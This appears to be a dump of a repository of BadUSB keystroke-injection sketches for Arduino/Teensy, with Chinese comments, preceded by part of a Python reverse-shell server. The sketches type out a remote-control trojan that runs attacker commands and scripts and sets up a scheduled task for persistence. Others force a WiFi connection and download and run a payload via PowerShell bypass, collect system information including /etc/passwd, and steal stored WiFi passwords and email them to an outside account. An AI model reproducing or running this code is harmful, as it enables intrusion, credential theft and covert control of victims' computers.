def handle_client(self): ''' 从客户端接收数据,并处理。 ''' request=self.client.recv(409600) #服务器端每次接收的最大数据 request=base64.b64decode(binascii.a2b_hex(request.strip())).split('*') #将接收到的数据进行解码 print request[0] #输出接收到的数据 path=request[1] contents=raw_input(path+'>') #返回当前路径 i='-p' if i in contents: lists=contents.split(' ') filename=lists[2] f=open(filename).read() contents='-p'+f contents_j=binascii.b2a_hex(base64.b64encode(contents)) #将要发送的数据加码 self.client.send(contents_j+' ') #发送数据 self.client.close() if contents=='kill' or contents=='exit': time.sleep(5) sys.exit() def main(self): self.connec() #执行连接函数 while True: ''' 循环接收客户端信息 ''' try: self.client,self.addr=self.server.accept() #接收到客户端数据对象,保存到client中,addr中的为客户端ip与端口号 self.handle_client() #执行接收发送数据函数 except: sys.exit() def mains(): ''' 从控制台接收参数,执行相应的代码(Server) ''' if len(sys.argv)>2: ip=str(sys.argv[1]) port=int(sys.argv[2]) address_all=(ip,port) servers(address_all) print '[HELP] PyShell.exe [ip] [port]' print '[HELP] python PyShellServer.py [ip] [port]' print u'connection:' print u'[HELP] exit ----退出连接' print u'[HELP] kill ----退出连接并自毁程序' print u'[HELP] playtask ----创建计划任务' print u'[HELP] python -p file.py ----在肉鸡上执行本地python脚本' else: print '[HELP] PyShell.exe [ip] [port]' print '[HELP] python PyShellServer.py [ip] [port]' print u'connection:' print u'[HELP] exit ----退出连接' print u'[HELP] kill ----退出连接并自毁程序' print u'[HELP] playtask ----创建计划任务' print u'[HELP] python -p file.py ----在肉鸡上执行本地python脚本' if __name__=='__main__': mains() ================================================ FILE: TrojanDownloader/PY_DownLoader/Py_TrojanWrite(TargetEnvironmentRunPython).ino ================================================ void setup() { Keyboard.begin(); delay(10000);//延时 Keyboard.press(KEY_LEFT_GUI); delay(200); Keyboard.print('r'); delay(200); Keyboard.release(KEY_LEFT_GUI); Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); delay(200); //=========================Run========================== Keyboard.println("CMD"); 
delay(1000); Keyboard.println("ECHO import socket >> PyShell.py"); delay(100); Keyboard.println("ECHO import base64 >> PyShell.py"); delay(100); Keyboard.println("ECHO import sys >> PyShell.py"); delay(100); Keyboard.println("ECHO import binascii >> PyShell.py"); delay(100); Keyboard.println("ECHO import os >> PyShell.py"); delay(100); Keyboard.println("ECHO import re >> PyShell.py"); delay(100); Keyboard.println("ECHO import threading >> PyShell.py"); delay(100); Keyboard.println("ECHO import time >> PyShell.py"); delay(100); Keyboard.println("ECHO from StringIO import StringIO >> PyShell.py"); delay(100); Keyboard.println("ECHO import requests >> PyShell.py"); delay(100); Keyboard.println("ECHO class clients: >> PyShell.py"); delay(100); Keyboard.println("ECHO """Client of PythonShell >> PyShell.py"); delay(100); Keyboard.println("ECHO """ >> PyShell.py"); delay(100); Keyboard.println("ECHO def __init__(self,client_address): >> PyShell.py"); delay(100); Keyboard.println("ECHO self.client_address=client_address >> PyShell.py"); delay(100); Keyboard.println("ECHO self.main() >> PyShell.py"); delay(100); Keyboard.println("ECHO def request_client(self): >> PyShell.py"); delay(100); Keyboard.println("ECHO ''' >> PyShell.py"); delay(100); Keyboard.println("ECHO 连接服务端 >> PyShell.py"); delay(100); Keyboard.println("ECHO ''' >> PyShell.py"); delay(100); Keyboard.println("ECHO try: >> PyShell.py"); delay(100); Keyboard.println("ECHO path=os.getcwd() >> PyShell.py"); delay(100); Keyboard.println("ECHO self.client=socket.socket(socket.AF_INET,socket.SOCK_STREAM) #创建一个socket对象 >> PyShell.py"); delay(100); Keyboard.println("ECHO self.client.connect(self.client_address) #连接服务端 >> PyShell.py"); delay(100); Keyboard.println("ECHO self.contents=binascii.b2a_hex(base64.b64encode(self.contents+'*'+path)) >> PyShell.py"); delay(100); Keyboard.println("ECHO self.client.send(self.contents) #发送数据 >> PyShell.py"); delay(100); Keyboard.println("ECHO except: >> PyShell.py"); delay(100); 
Keyboard.println("ECHO sys.exit() >> PyShell.py"); delay(100); Keyboard.println("ECHO def kill(self): >> PyShell.py"); delay(100); Keyboard.println("ECHO ''' >> PyShell.py"); delay(100); Keyboard.println("ECHO kill project >> PyShell.py"); delay(100); Keyboard.println("ECHO ''' >> PyShell.py"); delay(100); Keyboard.println("ECHO os.popen('kill.bat').read() >> PyShell.py"); delay(100); Keyboard.println("ECHO def exits(self): >> PyShell.py"); delay(100); Keyboard.println("ECHO ''' >> PyShell.py"); delay(100); Keyboard.println("ECHO exit project >> PyShell.py"); delay(100); Keyboard.println("ECHO ''' >> PyShell.py"); delay(100); Keyboard.println("ECHO os._exit(0) >> PyShell.py"); delay(100); Keyboard.println("ECHO def response_client(self): >> PyShell.py"); delay(100); Keyboard.println("ECHO ''' >> PyShell.py"); delay(100); Keyboard.println("ECHO 客户端处理服务端命令函数 >> PyShell.py"); delay(100); Keyboard.println("ECHO ''' >> PyShell.py"); delay(100); Keyboard.println("ECHO try: >> PyShell.py"); delay(100); Keyboard.println("ECHO response=self.client.recv(409600) >> PyShell.py"); delay(100); Keyboard.println("ECHO except: >> PyShell.py"); delay(100); Keyboard.println("ECHO sys.exit() >> PyShell.py"); delay(100); Keyboard.println("ECHO else: >> PyShell.py"); delay(100); Keyboard.println("ECHO response=base64.b64decode(binascii.a2b_hex(response.strip())) >> PyShell.py"); delay(100); Keyboard.println("ECHO try: >> PyShell.py"); delay(100); Keyboard.println("ECHO if response=='exit': #退出当前连接!! >> PyShell.py"); delay(100); Keyboard.println("ECHO sys.exit() >> PyShell.py"); delay(100); Keyboard.println("ECHO if response=='kill': #退出当前连接并自毁程序!! 
>> PyShell.py"); delay(100); Keyboard.println("ECHO try: >> PyShell.py"); delay(100); Keyboard.println("ECHO f=open('kill.bat','w') >> PyShell.py"); delay(100); Keyboard.println("ECHO f.write('ping -n 2 127.0.0.1 >nul\ndel /F PyShell.exe\ndel /F kill.bat') >> PyShell.py"); delay(100); Keyboard.println("ECHO f.close() >> PyShell.py"); delay(100); Keyboard.println("ECHO threading.Thread(target=self.kill).start() >> PyShell.py"); delay(100); Keyboard.println("ECHO time.sleep(0.5) >> PyShell.py"); delay(100); Keyboard.println("ECHO threading.Thread(target=self.exits).start() >> PyShell.py"); delay(100); Keyboard.println("ECHO except: >> PyShell.py"); delay(100); Keyboard.println("ECHO pass >> PyShell.py"); delay(100); Keyboard.println("ECHO if response=='playtask': #给自己创建计划任务! >> PyShell.py"); delay(100); Keyboard.println("ECHO try: >> PyShell.py"); delay(100); Keyboard.println("ECHO path=os.getcwd() >> PyShell.py"); delay(100); Keyboard.println("ECHO name=os.popen('whoami').read().split('\\')[1].replace('\n','') #获取当前用户名称 >> PyShell.py"); delay(100); Keyboard.println("ECHO command='schtasks.exe /Create /RU '+'"'+name+'"'+' /SC MINUTE /MO 30 /TN FIREWALL /TR '+'"'+path+\'\\PyShell.exe\'+'"'+' /ED 2016/12/12'#可执行文件一定要写绝对路径 >> PyShell.py"); delay(100); Keyboard.println("ECHO #以上这条为添加一条计划任务的命令!!! 
>> PyShell.py"); delay(100); Keyboard.println("ECHO self.contents=os.popen(command).read() >> PyShell.py"); delay(100); Keyboard.println("ECHO except: >> PyShell.py"); delay(100); Keyboard.println("ECHO pass >> PyShell.py"); delay(100); Keyboard.println("ECHO else: >> PyShell.py"); delay(100); Keyboard.println("ECHO i='-p' >> PyShell.py"); delay(100); Keyboard.println("ECHO if i in response: >> PyShell.py"); delay(100); Keyboard.println("ECHO lists=response.split('-p') >> PyShell.py"); delay(100); Keyboard.println("ECHO response=lists[1] >> PyShell.py"); delay(100); Keyboard.println("ECHO sys.stdout=result=StringIO() >> PyShell.py"); delay(100); Keyboard.println("ECHO exec(response) #执行python脚本文件 >> PyShell.py"); delay(100); Keyboard.println("ECHO self.contents=result.getvalue() >> PyShell.py"); delay(100); Keyboard.println("ECHO else: >> PyShell.py"); delay(100); Keyboard.println("ECHO self.contents=response.split('cd ') >> PyShell.py"); delay(100); Keyboard.println("ECHO m=re.search(self.res,response) >> PyShell.py"); delay(100); Keyboard.println("ECHO if m: >> PyShell.py"); delay(100); Keyboard.println("ECHO m=m.group() >> PyShell.py"); delay(100); Keyboard.println("ECHO else: >> PyShell.py"); delay(100); Keyboard.println("ECHO m='.' 
>> PyShell.py"); delay(100); Keyboard.println("ECHO if len(self.contents)>1: >> PyShell.py"); delay(100); Keyboard.println("ECHO os.chdir(self.contents[1].strip()) #切换目录,popen('cd ../')只能切换子目录,父目录改不了 >> PyShell.py"); delay(100); Keyboard.println("ECHO self.contents=' ' >> PyShell.py"); delay(100); Keyboard.println("ECHO else: >> PyShell.py"); delay(100); Keyboard.println("ECHO self.contents=os.popen(self.contents[0]).read() #执行普通的cmd命令 >> PyShell.py"); delay(100); Keyboard.println("ECHO os.chdir(m) >> PyShell.py"); delay(100); Keyboard.println("ECHO except: >> PyShell.py"); delay(100); Keyboard.println("ECHO self.contents=' ' >> PyShell.py"); delay(100); Keyboard.println("ECHO pass >> PyShell.py"); delay(100); Keyboard.println("ECHO self.client.close() >> PyShell.py"); delay(100); Keyboard.println("ECHO def main(self): >> PyShell.py"); delay(100); Keyboard.println("ECHO self.contents=' ' >> PyShell.py"); delay(100); Keyboard.println("ECHO self.res=r'[A-Za-z]:' >> PyShell.py"); delay(100); Keyboard.println("ECHO while True: >> PyShell.py"); delay(100); Keyboard.println("ECHO self.request_client() >> PyShell.py"); delay(100); Keyboard.println("ECHO self.response_client() >> PyShell.py"); delay(100); Keyboard.println("ECHO def mains(): >> PyShell.py"); delay(100); Keyboard.println("ECHO ''' >> PyShell.py"); delay(100); Keyboard.println("ECHO 从控制台接收参数,执行相应的代码(Client or Server) >> PyShell.py"); delay(100); Keyboard.println("ECHO ''' >> PyShell.py"); delay(100); Keyboard.println("ECHO url = 'https://www.youtube.com/watch?v=aDwCCUfNFug' //自定义下载木马网址 >> PyShell.py"); delay(100); Keyboard.println("ECHO r = requests.get(url) >> PyShell.py"); delay(100); Keyboard.println("ECHO with open('PyShell.exe', 'wb') as f: >> PyShell.py"); delay(100); Keyboard.println("ECHO f.write(r.content) >> PyShell.py"); delay(100); Keyboard.println("ECHO if len(sys.argv)>2: >> PyShell.py"); delay(100); Keyboard.println("ECHO ip=str(sys.argv[1]) >> PyShell.py"); delay(100); Keyboard.println("ECHO 
port=int(sys.argv[2]) >> PyShell.py"); delay(100); Keyboard.println("ECHO address_all=(ip,port) >> PyShell.py"); delay(100); Keyboard.println("ECHO clients(address_all) >> PyShell.py"); delay(100); Keyboard.println("ECHO print '[HELP] PyShell.exe [ip] [port]' >> PyShell.py"); delay(100); Keyboard.println("ECHO print '[HELP] python PyShell.py [ip] [port]' >> PyShell.py"); delay(100); Keyboard.println("ECHO print u'connection:' >> PyShell.py"); delay(100); Keyboard.println("ECHO print u'[HELP] exit ----退出连接' >> PyShell.py"); delay(100); Keyboard.println("ECHO print u'[HELP] kill ----退出连接并自毁程序' >> PyShell.py"); delay(100); Keyboard.println("ECHO print u'[HELP] playtask ----创建计划任务' >> PyShell.py"); delay(100); Keyboard.println("ECHO print u'[HELP] python -p file.py ----在肉鸡上执行本地python脚本' >> PyShell.py"); delay(100); Keyboard.println("ECHO else: >> PyShell.py"); delay(100); Keyboard.println("ECHO print '[HELP] PyShell.exe [ip] [port]' >> PyShell.py"); delay(100); Keyboard.println("ECHO print '[HELP] python PyShell.py [ip] [port]' >> PyShell.py"); delay(100); Keyboard.println("ECHO print u'connection:' >> PyShell.py"); delay(100); Keyboard.println("ECHO print u'[HELP] exit ----退出连接' >> PyShell.py"); delay(100); Keyboard.println("ECHO print u'[HELP] kill ----退出连接并自毁程序' >> PyShell.py"); delay(100); Keyboard.println("ECHO print u'[HELP] playtask ----创建计划任务' >> PyShell.py"); delay(100); Keyboard.println("ECHO print u'[HELP] python -p file.py ----在肉鸡上执行本地python脚本' >> PyShell.py"); delay(100); Keyboard.println("python PyShell.py [ip] [port]"); //输入自己的IP及端口,在攻击者电脑上执行服务器脚本,等待目标连接 delay(2000); Keyboard.press(KEY_LEFT_GUI); delay(200); Keyboard.print('r'); delay(200); Keyboard.release(KEY_LEFT_GUI); delay(200); Keyboard.println('CMD'); delay(600); Keyboard.println('EXIT'); //====================================================== Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); Keyboard.end();//结束键盘通讯 } void loop() { } ================================================ 
FILE: Ubuntu_InformationGathering/BasicTerminalCommandsForUbuntu(Display).ino ================================================ //Ubuntu的基本终端命令 void setup() { Keyboard.begin(); delay(3000);//延时 Keyboard.press(KEY_LEFT_ALT); delay(200); Keyboard.press(KEY_F2); delay(200); Keyboard.release(KEY_LEFT_ALT); Keyboard.release(KEY_F2); delay(500); Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); delay(200); //=========================Run========================== Keyboard.println("XTERM"); delay(500); Keyboard.println(); delay(750); Keyboard.print("PWD"); delay(500); Keyboard.println(); delay(300); Keyboard.print("ID"); delay(300); Keyboard.println(); delay(500); Keyboard.print("CAT /ETC/PASSWD") delay(500); Keyboard.println(); //====================================================== Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); Keyboard.end();//结束键盘通讯 } void loop() { } ================================================ FILE: Ubuntu_InformationGathering/UbuntuInformationCollectionTXT_File(Information).ino ================================================ //信息收集 //启用Ubuntu终端搜集操作系统信息 void setup() { Keyboard.begin(); delay(3000); Keyboard.press(KEY_LEFT_ALT); delay(200); Keyboard.press(KEY_F2); delay(200); Keyboard.release(KEY_LEFT_ALT); Keyboard.release(KEY_F2); Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); delay(200); //=========================Run========================== Keyboard.print("GNOME-TERMINAL"); delay(100); Keyboard.println(); delay(200); Keyboard.print("CLEAR"); delay(10); Keyboard.println(); delay(50); Keyboard.print("ECHO \"lOGGED IN USER:\" $user > INFO_GATHERING.TXT"); Keyboard.println(); delay(50); Keyboard.print("ECHO >> INFO_GATHERING.TXT"); delay(50); Keyboard.println(); delay(50); Keyboard.print("ECHO 0N \"dISTRIBUTION kERNEL vERSION:\" >> INFO_GATHERING.TXT"); delay(50); Keyboard.println(); delay(50); Keyboard.print("CAT /ETC/ISSUE | CUT -C1-13 >> INFO_GATHERING.TXT"); delay(50); Keyboard.println(); 
delay(50); Keyboard.print("ECHO -N \"UNAME RESULTS: \" >> INFO_GATHERING.TXT"); delay(50); Keyboard.println(); delay(50); Keyboard.print("UNAME -A >> INFO_GATHERING.TXT"); delay(50); Keyboard.println(); delay(100); Keyboard.print("ECHO >> INFO_GATHERING.TXT"); delay(50); Keyboard.println(); delay(50); Keyboard.print("ECHO \"sHELLSOCK bUG vULNERABILITY\" >> INFO_GATHERING.TXT"); delay(50); Keyboard.println(); Keyboard.print("ECHO >> INFO_GATHERING.TXT"); Keyboard.println(); delay(50); Keyboard.print("ENV X='() { :;};ECHO VULNERABLE' BASH -C `ECHO HELLO` >> INFO_GATHERING.TXT"); delay(50); Keyboard.println(); delay(100); Keyboard.println(); delay(100); Keyboard.print("ECHO >> INFO_GATHERING.TXT"); delay(50); Keyboard.println(); delay(50); Keyboard.println("ECHO \"mOUNTED FILESYSTEMS\" >> INFO_GATHERING.TXT"); delay(50); Keyboard.println("MOUNT -L >> INFO_GATHERING.TXT"); delay(50); Keyboard.println(); delay(100); Keyboard.println("ECHO >> INFO_GATHERING.TXT"); delay(50); Keyboard.print("ECHO \"nETWORK cONFIGURATION\" >> INFO_GATHERING.TXT"); delay(50); Keyboard.println(); delay(50); Keyboard.println("IFCONFIG -A | GREP 'lINK\\|INET' >> INFO_GATHERING.TXT"); delay(50); Keyboard.println("ECHO >> INFO_GATHERING.TXT"); delay(50); Keyboard.println("ECHO \"pRINT hOSTS\" >> INFO_GATHERING.TXT"); delay(50); Keyboard.println("CAT /ETC/HOSTS >> INFO_GATHERING.TXT"); delay(50); Keyboard.println("ECHO ECHO \"pRINT arp\" >> INFO_GATHERING.TXT"); delay(50); Keyboard.println("ARP >> INFO_GATHERING.TXT"); delay(50); Keyboard.println("ECHO >> INFO_GATHERING.TXT"); delay(50); Keyboard.println("ECHO \"dEVELOPMENT TOOLS AVAILABILITY\" >> INFO_GATHERING.TXT"); delay(50); Keyboard.println("WHICH GCC >> INFO_GATHERING.TXT"); delay(50); Keyboard.println("WHICH G++ >> INFO_GATHERING.TXT"); delay(50); Keyboard.println("WHICH PYTHON >> INFO_GATHERING.TXT"); delay(50); Keyboard.println("ECHO >> INFO_GATHERING.TXT"); delay(50); Keyboard.println("ECHO \"pRINT tcp/UDP lISTENING sERVICES\" >> 
INFO_GATHERING.TXT"); delay(50); Keyboard.println("NETSTAT -TUNLPE >> INFO_GATHERING.TXT"); delay(300); Keyboard.println("ECHO >> INFO_GATHERING.TXT"); delay(50); Keyboard.print("ECHO \"iNSTALLED pACKAGES\" >> INFO_GATHERING.TXT"); delay(50); Keyboard.println(); delay(200); Keyboard.println("DPKG -L >> INFO_GATHERING.TXT"); delay(300); Keyboard.println("ECHO >> INFO_GATHERING.TXT"); delay(50); Keyboard.println("ECHO \"fIND rEADABLE fOLDERS IN /ETC\" >> INFO_GATHERING.TXT"); delay(50); Keyboard.println("FIND /ETC -USER `ID -U` -PERM -U=R -O -GROUP `ID -G` -PERM -G=R -O -PERM -O=R -LS 2> /DEV/NULL >> INFO_GATHERING.TXT"); delay(500); Keyboard.println("ECHO >> INFO_GATHERING.TXT"); delay(50); Keyboard.println("\"fIND suid AND guid FILES\" >> INFO_GATHERING.TXT"); delay(50); Keyboard.print("FIND / -TYPE F -PERM -U=S -O -TYPE F -PERM -G=S -LS 2>/DEV/NULL >> INFO_GATHERING.TXT"); delay(50); Keyboard.println(); //====================================================== Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); Keyboard.end(); } void loop() { } ================================================ FILE: WiFi_ConnectionTrojan/ForceConnectionToSpecifiedWiFi-DownloadPSL_TrojanRun.ino ================================================ #define BOARDTYPE #ifdef TEENSY2 #include #endif void setup(){ delay(3000); wait_for_drivers(2000); minimise_windows(); delay(500); while(!cmd(3,500,"cmd /T:01 /K \"@echo off && mode con:COLS=15 LINES=1 && title Installing Drivers\"")) { reset_windows_desktop(2000); } Keyboard.println("echo ^ > %TEMP%\\pl.xml "); Keyboard.println("echo ^ >> %TEMP%\\pl.xml "); //强迫连接WIFI热点,并下载psl木马 Keyboard.println("echo ^INPUT0^ >> %TEMP%\\pl.xml "); Keyboard.println("echo ^ >> %TEMP%\\pl.xml "); Keyboard.println("echo ^ >> %TEMP%\\pl.xml "); Keyboard.println("echo ^INPUT1^ >> %TEMP%\\pl.xml "); Keyboard.println("echo ^INPUT0^ >> %TEMP%\\pl.xml "); Keyboard.println("echo ^ >> %TEMP%\\pl.xml "); Keyboard.println("echo ^ >> %TEMP%\\pl.xml "); 
Keyboard.println("echo ^ESS^ >> %TEMP%\\pl.xml "); Keyboard.println("echo ^auto^ >> %TEMP%\\pl.xml "); Keyboard.println("echo ^ >> %TEMP%\\pl.xml "); Keyboard.println("echo ^ >> %TEMP%\\pl.xml "); Keyboard.println("echo ^ >> %TEMP%\\pl.xml "); Keyboard.println("echo ^WPA2PSK^ >> %TEMP%\\pl.xml "); Keyboard.println("echo ^AES^ >> %TEMP%\\pl.xml "); Keyboard.println("echo ^false^ >> %TEMP%\\pl.xml "); Keyboard.println("echo ^ >> %TEMP%\\pl.xml "); Keyboard.println("echo ^ >> %TEMP%\\pl.xml "); Keyboard.println("echo ^passPhrase^ >> %TEMP%\\pl.xml "); Keyboard.println("echo ^false^ >> %TEMP%\\pl.xml "); Keyboard.println("echo ^INPUT2^ >> %TEMP%\\pl.xml "); Keyboard.println("echo ^ >> %TEMP%\\pl.xml "); Keyboard.println("echo ^ >> %TEMP%\\pl.xml "); Keyboard.println("echo ^ >> %TEMP%\\pl.xml "); Keyboard.println("echo ^ >> %TEMP%\\pl.xml "); Keyboard.println("netsh wlan add profile filename=%TEMP%\\pl.xml "); delay(2000); Keyboard.println("netsh wlan connect name=INPUT0 "); delay(3000); Keyboard.println("echo $wc = New-Object System.Net.WebClient > %temp%\\dl.ps1"); Keyboard.println("echo $url = \"INPUT3\" >> %temp%\\dl.ps1"); Keyboard.println("echo [string]$hex = $wc.DownloadString($url) >> %temp%\\dl.ps1"); Keyboard.println("echo [Byte[]] $temp = $hex -split ' ' >> %temp%\\dl.ps1"); Keyboard.println("echo [System.IO.File]::WriteAllBytes(\"%TEMP%\\svcfw.exe\", $temp) >> %temp%\\dl.ps1"); Keyboard.println("echo start-process -nonewwindow \"%TEMP%\\svcfw.exe\" >> %temp%\\dl.ps1"); delay(2000); Keyboard.println("echo Set oShell = CreateObject(\"WScript.Shell\") > %temp%\\dl.vbs"); Keyboard.println("echo oShell.Run(\"powershell.exe -ep bypass -nologo -c %temp%\\dl.ps1\"),0,true >> %temp%\\dl.vbs"); delay(1000); Keyboard.println("wscript %temp%\\dl.vbs"); delay(3000); Keyboard.println("exit"); } void loop(){ } DEFS ================================================ FILE: WiFi_PasswordAcquisition/WiFiPasswordCapture(tool).ino ================================================ / 
/无线密码捕获工具 //说明:将SSID、网络类型、鉴权、密码保存到Log.txt中,将Log.txt的内容通过email发送到gmail账户。 void setup() { Keyboard.begin(); delay(3000); //Minimize all windows and open run cmd Keyboard.press(KEY_LEFT_GUI); delay(200); Keyboard.press('d'); delay(200); Keyboard.release('d'); delay(200); Keyboard.print("r"); delay(200); Keyboard.release(KEY_LEFT_GUI); Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); delay(200); //=========================cmd========================== Keyboard.println("cmd"); delay(1000); //获取SSID信息 Keyboard.println("CD \"%userprofile%\\dEsktop\" & FOR /F \"TOKENS=2 DELIMS=: \" %A in ('NETSH WLAN SHOW INTERFACE ^| FINDSTR \"SSID\" ^| FINDSTR /V \"bssid\"') DO SET a=%a"); //搜寻关键字符串,创建TXT文件 Keyboard.println("NETSH WLAH SHOW PROFILES %a% KEY=CLEAR | FINDSTR /C:\"nETWORK TYPE\" /C:\"aUTHENTICATION\" /C:\"kEY cONTENT\" | FINDSTR /V \"BROADCAST\" | FINDSTR /V \"rADIO\">>a.TXT"); //获取网络类型 Keyboard.println("FOR /F \"TOKENS=3 DELIMS=: \" %a IN ('FINDSTR \"nETWORK TYPE\" a.TXT') DO SET b=%a"); //获得认证 Keyboard.println("FOR /F \"TOKENS=2 DELIMS=: \" %a IN ('FINDSTR \"aUTHENTICATION\" a.TXT') DO SET c=%a"); //获得密码 Keyboard.println("FOR /F \"TOKENS=3 DELIMS=: \" %a IN ('FINDSTR \"kEY cONTENT\" a.TXT') DO SET d=%a"); //删除TXT文件 Keyboard.println("DEL a.TXT"); //创建文件Log.txt Keyboard.println("ECHO ssid: %a%>>lOG.TXT & ECHO nETWORK TYPE: %b%>>lOG.TXT & ECHO aUTHENTICATION: %c%>>lOG.TXT & ECHO pASSWORD: %d%>>lOG.TXT"); //邮件发送Log.txt Keyboard.println("POWERSHELL"); Keyboard.println("$smtpiNFO = nEW-oBJECT nET.mAIL.sMTPcLIENT('SMTP.GMAIL.COM', 587)");//国内推荐使用163,qq邮箱 Keyboard.println("$smtpiNFO.eNABLEsSL = $TRUE"); Keyboard.println("$smtpiNFO.cREDENTIALS = nEW-oBJECT sYSTEM.nET.nETWORKcREDENTIAL('account@GMAIL.COM', 'password')");//邮箱账号、密码 Keyboard.println("$rEPORTeMAIL = nEW-oBJECT sYSTEM.nET.mAIL.mAILmESSAGE"); Keyboard.println("$rEPORTeMAIL.fROM = 'account@GMAIL.COM'"); Keyboard.println("$rEPORTeMAIL.tO.aDD('receiver@GMAIL.COM')"); Keyboard.println("$rEPORTeMAIL.sUBJECT = 
'wIfI KET GRABBER'"); Keyboard.println("$rEPORTeMAIL.bODY = (gET-cONTENT lOG.TXT | OUT-sTRING)"); Keyboard.println("$smtpiNFO.sEND($rEPORTeMAIL)"); Keyboard.println("EXIT"); Keyboard.println("DEL lOG.TXT & EXIT")//清除log.txt文件并退出 //====================================================== Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); Keyboard.end();//结束键盘通讯 } void loop() { } ================================================ FILE: WiFi_PasswordAcquisition/WiFiPasswordExport(tool).ino ================================================ void setup() {//初始化 Keyboard.begin();//开始键盘通讯 delay(5000);//延时 Keyboard.press(KEY_LEFT_GUI);//win键 delay(500); Keyboard.press('r');//r键 delay(500); Keyboard.release(KEY_LEFT_GUI); Keyboard.release('r'); delay(500); Keyboard.println("CMD /C START /MIN REG DELETE hkcu\\sOFTWARE\\mICROSOFT\\wINDOWS\\cURRENTvERSION\\eXPLORER\\rUNmru /F&CMD /C START /MIN NETSH WLAN EXPORT PROFILE KEY=CLEAR FOLDER=C:\\"); //WIFI密码导出到指定位置 Keyboard.end();//结束键盘通讯 } void loop()//循环 { }